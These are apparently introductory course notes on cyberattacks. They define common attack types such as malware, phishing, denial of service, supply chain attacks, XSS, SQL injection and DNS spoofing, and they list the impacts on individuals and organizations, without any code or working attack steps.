What is Cyber Attack? A cyberattack is any intentional effort to steal, expose, alter, disable, or destroy data, applications, or other assets through unauthorized access to a network, computer system or digital device. Evolution of Cyber Attacks ● Go through links as discussed in class. ● https://www.manageengine.com/log-management/cyber-security-attacks/history-of-c yber-attacks.html ● https://www.codecademy.com/article/evolution-of-cybersecurity Types of Cyber attacks ● Cybercriminals use many sophisticated tools and techniques to start cyberattacks against enterprise IT systems, personal computers, and other targets. Some of the most common types of cyberattacks include: ○ Malware ○ Social engineering ○ Denial-of-service attacks ○ Account compromise ○ Man-in-the-middle attacks ○ Supply chain attacks Malware ● Malware is malicious software that can render infected systems inoperable. Malware can destroy data, steal information, or even wipe files critical to the operating system’s ability to run. Malware comes in many forms, including: ○ Trojan horses ○ Ransomware ○ Scareware ○ Spyware ○ Rootkits ○ Virus ○ Worms Trojan Horse Trojan horses disguise themselves as useful programs or hide within legitimate software to trick users into installing them. A remote access Trojan (RAT) creates a secret back door on the victim’s device, while a dropper Trojan installs additional malware once it has a foothold. A Trojan horse: ● Cannot replicate itself. ● Often contains spying functions (such as a packet sniffer) or backdoor functions that allow a computer to be remotely controlled from the network. ● Often is hidden in useful software such as screen savers or games. ● Example: Back Orifice, Net Bus, Whack-a-Mole. Ransomware Ransomware is sophisticated malware that uses strong encryption to hold data or systems hostage. Cybercriminals then demand payment in exchange for releasing the system and restoring functionality. According to IBM’s X-Force Threat Intelligence Index, ransomware is the second most common type of cyberattack, accounting for 17% of attacks. Scareware ● Scareware uses fake messages to frighten victims into downloading malware or passing sensitive information to a fraudster. Spyware ● Spyware is a type of malware that secretly gathers sensitive information, like usernames, passwords, and credit card numbers. It then sends this information back to the hacker. Rootkits • Rootkits are malware packages that allow hackers to gain administrator-level access to a computer’s operating system or other assets. Virus ● A virus is a program that attempts to damage a computer system and replicate itself to other computer systems. A virus: ● Requires a host to replicate and usually attaches itself to a host file or a hard drive sector. ● Replicates each time the host is used. ● Often focuses on destruction or corruption of data. ● Usually attaches to files with execution capabilities such as .doc, .exe, and .bat extensions. ● Often distributes via e-mail. Many viruses can e-mail themselves to everyone in your address book. ● Examples: Stoned, Michelangelo, Melissa, I Love You. Worms ● Worms are self-replicating malicious code that can automatically spread between apps and devices. ● A worm can negatively impact network traffic just in the process of replicating itself. A worm: ● Can install a backdoor in the infected computer. ● Is usually introduced into the system through a vulnerability. ● Infects one system and spreads to other systems on the network. ● Example: Code Red. Social Engineering Attacks ● Social engineering attacks manipulate people into doing things that they shouldn’t do, like sharing information they shouldn’t share, downloading software they shouldn’t download, or sending money to criminals. Phishing ● Phishing is one of the most pervasive social engineering attacks. According to the Cost of a Data Breach report, it is the second most common cause of breaches. ● The most basic phishing scams use fake emails or text messages to steal users’ credentials, exfiltrate sensitive data, or spread malware. ● Phishing messages are often designed to look as though they’re coming from a legitimate source. They usually direct the victim to click a hyperlink that takes them to a malicious website or open an email attachment that turns out to be malware. Cybercriminals have also developed more sophisticated methods of phishing. ● Spear phishing is a highly targeted attack that aims to manipulate a specific individual, often by using details from the victim’s public social media profiles to make the ruse more convincing. ● Whale phishing is a type of spear phishing that specifically targets high-level corporate officers. ● In a business email compromise (BEC) scam, cybercriminals pose as executives, vendors, or other business associates to trick victims into wiring money or sharing sensitive data. Denial-of-service attacks ● Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks flood a system's resources with fraudulent traffic. This traffic overwhelms the system, preventing responses to legitimate requests and reducing the system's ability to perform. A denial-of-service attack may be an end in itself or a setup for another attack. Account compromise ● Account compromise is any attack in which hackers hijack a legitimate user's account for malicious activity. ● Cybercriminals can break into a user's account in many ways. They can steal credentials through phishing attacks or buy stolen password databases off the dark web. ● They can use password attack tools like Hashcat and John the Ripper to break password encryptions or stage brute force attacks, in which they run automated scripts or bots to generate and test potential passwords until one works. Man-in-the-middle (MiTM) Attack ● In a man-in-the-middle (MiTM) attack, also called an "eavesdropping attack," a hacker secretly intercepts communications between two people or between a user and a server. MitM attacks are commonly carried out via unsecured public wifi networks, where it's relatively easy for threat actors to spy on traffic. Supply Chain Attacks ● Supply chain attacks are cyberattacks in which hackers breach a company by targeting its software vendors, material suppliers, and other service providers. Because vendors are often connected to their customers' networks in some way, hackers can use the vendor's network as an attack vector to access multiple targets at once. ● For example, in 2020, Russian state actors hacked the software vendor SolarWinds and distributed malware to its customers under the guise of a software update (link resides outside ibm.com). The malware allowed Russian spies to access the sensitive data of various US government agencies using SolarWinds' services, including the Treasury, Justice, and State Departments. Cross-site scripting (XSS) ● Cross-site scripting (XSS) attacks insert malicious code into a legitimate web page or web application. When a user visits the site or app, the code automatically runs in the user's web browser, usually stealing sensitive information or redirecting the user to a spoofed, malicious website. Attackers frequently use JavaScript for XSS attacks. SQL injection attacks ● SQL injection attacks use Structured Query Language (SQL) to send malicious commands to a website's or app's backend database. Hackers input the commands through user-facing fields like search bars and login windows. The commands are then passed to the database, prompting it to return private data like credit card numbers or customer details. Zero-day exploits ● Zero-day exploits take advantage of zero-day vulnerabilities, which are vulnerabilities either unknown to the security community or identified but not yet patched. These vulnerabilities can exist for days, months, or years before developers learn about the flaws, making them prime targets for hackers. DNS spoofing attacks ● DNS spoofing attacks, also called "DNS poisoning," covertly edit DNS records to replace a website's real IP address with a fake one. When victims try to visit the real site, they're unknowingly delivered to a malicious copy that steals their data or spreads malware. Impact of Cyber Attacks at Individual Level 1. Financial Losses: Individuals may suffer financial losses due to theft of personal information such as credit card details, bank account credentials, or identity theft. 2. Identity Theft: Cyber attacks can result in identity theft, where personal information is used to impersonate the victim for fraudulent activities, leading to damage to credit scores and financial reputation. 3. Privacy Breaches: Individuals may experience breaches of privacy as cyber attackers gain unauthorized access to personal data, including sensitive information such as medical records, private communications, or personal photos. 4. Emotional Distress: Victims of cyber attacks may experience emotional distress, anxiety, or trauma due to the violation of their privacy and the feeling of being violated. 5. Reputation Damage: If personal information or embarrassing data is leaked online as a result of a cyber attack, individuals may suffer reputational damage, impacting their personal and professional lives. 6. Potential Physical Harm: In extreme cases, cyber attacks on individuals, such as those targeting medical devices or connected infrastructure (e.g., smart home systems), can result in physical harm or endangerment of life. Impact of Cyber Attacks at Organizational Level 1. Financial Losses: Cyber attacks on organizations can result in significant financial losses due to theft of funds, disruption of business operations, and costs associated with incident response, recovery, and potential legal liabilities. 2. Reputation Damage: Organizations may suffer reputational damage due to breaches of customer data or failure to protect sensitive information, leading to loss of trust among customers, partners, and stakeholders. 3. Operational Disruption: Cyber attacks can disrupt business operations, causing downtime, loss of productivity, and disruption of supply chains, leading to direct financial losses and long-term impacts on competitiveness. 4. Intellectual Property Theft: Organizations may face intellectual property theft through cyber attacks, resulting in loss of competitive advantage, compromised innovation, and potential legal battles. 5. Regulatory Compliance Issues: Cyber attacks can lead to non-compliance with data protection regulations, resulting in fines, penalties, and legal consequences for organizations. 6. Damage to Infrastructure: Certain cyber attacks, such as those targeting critical infrastructure or industrial systems, can cause physical damage, disruption of essential services, and even endanger lives. Thank you!